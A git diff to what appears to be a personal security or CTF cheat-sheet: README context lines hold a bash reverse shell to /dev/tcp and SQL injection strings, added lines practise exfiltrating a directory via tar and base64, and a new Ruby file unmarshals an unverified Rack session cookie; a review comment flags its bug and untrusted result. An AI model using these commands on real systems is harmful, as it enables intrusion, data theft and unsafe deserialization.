Diffstat (limited to '')
-rw-r--r-- | README.txt | 24 | ||||
-rw-r--r-- | docs/lang/ruby/rack_session_cookie.rb | 12 |
2 files changed, 36 insertions, 0 deletions
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
 ' OR 1=1-- # SQL inject (pass)
 ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
 curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
+
+
+
+**How not to exfil a directory**
+ $ zip challenge/
+ $ gzip challenge
+ $ ls
+ $ ls challenge
+ $ rm challenge.gz
+ $ man gzip
+ $ exit
+**Log Back In**
+ $ gzip -k challenge
+ $ ls
+ $ base64 challenge.gz
+ $ exit
+**Log Back In**
+ $ rm challenge.gz
+ $ tar -czf challenge
+ $ ls
+ $ tar -czf challenge.tar.gz challenge
+ $ ls
+ $ base64 challenge.tar.gz
+ $ exit
diff --git a/docs/lang/ruby/rack_session_cookie.rb b/docs/lang/ruby/rack_session_cookie.rb
new file mode 100644
index 0000000..5b0a62a
--- /dev/null
+++ b/docs/lang/ruby/rack_session_cookie.rb
@@ -0,0 +1,12 @@
+require 'base64'
+require 'cgi'
+
+# 'SessionId' class possibly not provided by import.
+# A dummy definition is needed for the Marshal.load()
+#require 'rack'
+class Rack::Session::SessionId
+end
+
+cookie = "....."
+
+obj = Marshal.load(Base64.decode64(CGI.unescape(cookie.split("\n").join).split('--').first)) |
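Review bot: `class Rack::Session::SessionId` raises NameError (uninitialized constant Rack) while `require 'rack'` stays commented out, because the scoped class form does not create the enclosing `Rack` and `Session` modules; nest them explicitly as below so the stand-in actually loads. The last line also deserves a comment stating that everything after `--` is the cookie's signature and is discarded, so the object `Marshal.load` builds has not been integrity-checked. Marshal instantiates whatever classes the payload names, which is why the dummy class is needed at all, so this decode belongs only on cookies issued by an application you control; any further class the payload references will fail the same way with ArgumentError. Suggested comment above the `obj =` line: `# payload before '--' only; the signature is not verified here, so treat the decoded object as untrusted`.
```ruby
# Stand-in so Marshal.load can build the session id without loading rack;
# the scoped form `class Rack::Session::SessionId` needs Rack::Session to exist first.
module Rack
  module Session
    class SessionId; end
  end
end
# … unchanged: cookie assignment and Marshal.load …
```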